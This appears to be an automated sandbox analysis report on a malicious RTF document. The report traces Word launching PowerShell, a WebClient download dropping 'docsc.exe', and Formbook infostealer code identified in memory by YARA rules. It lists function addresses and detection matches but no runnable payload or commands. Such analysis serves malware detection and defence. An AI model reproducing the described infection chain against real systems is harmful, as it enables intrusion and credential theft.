Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00661750 10_2_00661750
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00662EB8 10_2_00662EB8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00661968 10_2_00661968
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00661956 10_2_00661956
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00661350 10_2_00661350
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_006613B6 10_2_006613B6
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00661983 10_2_00661983
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00401030 12_2_00401030
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041C273 12_2_0041C273
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041BAA2 12_2_0041BAA2
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00408C5B 12_2_00408C5B
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00408C60 12_2_00408C60
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041BC22 12_2_0041BC22
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041CC24 12_2_0041CC24
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041B4A6 12_2_0041B4A6
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041BD4F 12_2_0041BD4F
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041C501 12_2_0041C501
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00402D87 12_2_00402D87
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00402D90 12_2_00402D90
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041BDBD 12_2_0041BDBD
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041BF3C 12_2_0041BF3C
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041C7A5 12_2_0041C7A5
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00402FB0 12_2_00402FB0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0075905A 12_2_0075905A
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00743040 12_2_00743040
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0076D005 12_2_0076D005
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0073E0C6 12_2_0073E0C6
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007E1238 12_2_007E1238
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0073E2E9 12_2_0073E2E9
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0078A37B 12_2_0078A37B
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00747353 12_2_00747353
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00742305 12_2_00742305
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007663DB 12_2_007663DB
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0073F3CF 12_2_0073F3CF
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0077D47D 12_2_0077D47D
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00775485 12_2_00775485
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00751489 12_2_00751489
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00786540 12_2_00786540
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0074351F 12_2_0074351F
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0075C5F0 12_2_0075C5F0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007E2622 12_2_007E2622
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0074E6C1 12_2_0074E6C1
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00744680 12_2_00744680
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007757C3 12_2_007757C3
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0074C7BC 12_2_0074C7BC
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007C579A 12_2_007C579A
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0076286D 12_2_0076286D
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0074C85C 12_2_0074C85C
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007DF8EE 12_2_007DF8EE
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007C5955 12_2_007C5955
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007569FE 12_2_007569FE
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007429B2 12_2_007429B2
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007E098E 12_2_007E098E
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007F3A83 12_2_007F3A83
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00767B00 12_2_00767B00
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0073FBD7 12_2_0073FBD7
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007CDBDA 12_2_007CDBDA
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007ECBA4 12_2_007ECBA4
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0074CD5B 12_2_0074CD5B
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00770D3B 12_2_00770D3B
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007DFDDD 12_2_007DFDDD
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0075EE4C 12_2_0075EE4C
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00772E2F 12_2_00772E2F
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0076DF7C 12_2_0076DF7C
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00750F3F 12_2_00750F3F
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_002767C7 12_2_002767C7
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00275062 12_2_00275062
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_002708F9 12_2_002708F9
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00270902 12_2_00270902
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_002732FF 12_2_002732FF
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00273302 12_2_00273302
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00271362 12_2_00271362
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_002775B2 12_2_002775B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_02151238 14_2_02151238
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020AE2E9 14_2_020AE2E9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020B2305 14_2_020B2305
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020B7353 14_2_020B7353
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020FA37B 14_2_020FA37B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_021563BF 14_2_021563BF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020AF3CF 14_2_020AF3CF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020D63DB 14_2_020D63DB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020DD005 14_2_020DD005
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020B3040 14_2_020B3040
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020C905A 14_2_020C905A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0212D06D 14_2_0212D06D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020AE0C6 14_2_020AE0C6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_02152622 14_2_02152622
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020FA634 14_2_020FA634
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020B4680 14_2_020B4680
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020BE6C1 14_2_020BE6C1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0213579A 14_2_0213579A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020BC7BC 14_2_020BC7BC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020E57C3 14_2_020E57C3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0213443E 14_2_0213443E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020ED47D 14_2_020ED47D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020C1489 14_2_020C1489
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020E5485 14_2_020E5485
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020B351F 14_2_020B351F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020F6540 14_2_020F6540
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_021305E3 14_2_021305E3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020CC5F0 14_2_020CC5F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_02163A83 14_2_02163A83
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020D7B00 14_2_020D7B00
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0215CBA4 14_2_0215CBA4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0213DBDA 14_2_0213DBDA
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020AFBD7 14_2_020AFBD7
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020BC85C 14_2_020BC85C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020D286D 14_2_020D286D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0212F8C4 14_2_0212F8C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0214F8EE 14_2_0214F8EE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_02135955 14_2_02135955
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0213394B 14_2_0213394B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0215098E 14_2_0215098E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020B29B2 14_2_020B29B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020C69FE 14_2_020C69FE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020E2E2F 14_2_020E2E2F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020CEE4C 14_2_020CEE4C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020C0F3F 14_2_020C0F3F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020DDF7C 14_2_020DDF7C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0214CFB1 14_2_0214CFB1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_02122FDC 14_2_02122FDC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020E0D3B 14_2_020E0D3B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020BCD5B 14_2_020BCD5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0214FDDD 14_2_0214FDDD
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009B4A6 14_2_0009B4A6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009C7A5 14_2_0009C7A5
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009CC24 14_2_0009CC24
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_00088C5B 14_2_00088C5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_00088C60 14_2_00088C60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_00082D87 14_2_00082D87
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_00082D90 14_2_00082D90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_00082FB0 14_2_00082FB0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: String function: 007AF970 appears 81 times
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: String function: 00783F92 appears 108 times
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: String function: 0078373B appears 238 times
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: String function: 0073E2A8 appears 38 times
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: String function: 0073DF5C appears 118 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 020ADF5C appears 121 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 020F373B appears 245 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 020F3F92 appears 132 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 020AE2A8 appears 38 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 0211F970 appears 84 times
PE file contains strange resources
Source: docsc[1].exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: docsc.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2095013575.0000000000210000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2097570171.0000000000310000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000008.00000002.2096198856.0000000000340000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: docsc[1].exe.0.dr Static PE information: Section: U#j;F_` ZLIB complexity 1.00031723159
Source: docsc.exe.3.dr Static PE information: Section: U#j;F_` ZLIB complexity 1.00031723159
Source: classification engine Classification label: mal100.troj.expl.evad.winRTF@20/17@9/10
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$60a1e9_by_Libranalysis.rtf Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRBC4C.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................p.......#.......................p.......................`I.........v.....................K...................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............+..j......................p.............}..v....(.......0................"`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...`.......0................!`.....6.......4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../...............+..j......................p.............}..v............0................"`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.p.............}..v............0................!`.....".......4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;...............+..j....`.................p.............}..v............0................"`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G..................j....0%`...............p.............}..v............0...............................4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G...............+..j....`.................p.............}..v............0................"`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S..................j....0%`...............p.............}..v............0...............................4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S...............+..j....`.................p.............}..v............0................"`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._.......e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'..........!`.....H.......4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._...............+..j......................p.............}..v............0................"`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k..................j....0%`...............p.............}..v............0...............................4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k...............+..j......................p.............}..v............0................"`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.^.....w..................j....0%`...............p.............}..v....@.......0.......................f.......4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w...............+..j......................p.............}..v....x.......0................"`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j....0%`...............p.............}..v............0................!`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j......................p.............}..v....@.......0................"`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.^.....................;/.j......`...............p.............}..v.....F......0...............................4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j.....F................p.............}..v....HG......0.................`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................;/.j......`...............p.............}..v.....M......0...............................4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j.....N................p.............}..v.....O......0.................`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.4.4.............}..v.... S......0...............x.`.....$.......4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j.....S................p.............}..v....XT......0.................`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................;/.j......`...............p.............}..v.... [......0...............................4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j.....[................p.............}..v....X\......0.................`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................;/.j......`...............p.............}..v.... c......0...............................4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j.....c................p.............}..v....Xd......0.................`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'.........x.`.....H.......4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j.....j................p.............}..v.....j......0.................`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................;/.j......`...............p.............}..v....Pq......0...............................4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j.....r................p.............}..v.....r......0.................`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v.....v......0...............x.`.....&.......4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j....Xw................p.............}..v.....w......0.................`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................;/.j......`...............p.............}..v.....~......0...............................4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j....X.................p.............}..v............0.................`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0...............x.`.....<.......4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j......................p.............}..v....P.......0.................`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ .......;/.j......`...............p.............}..v............0...............x.`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j......................p.............}..v............0.................`.............4............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................p.......#.......................p.......................`I.........v.....................K...................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j....P.................p.............}..v............0...............X#}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0................"}.....6....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../..................j......................p.............}..v....@.......0...............X#}............................. Jump to behavior
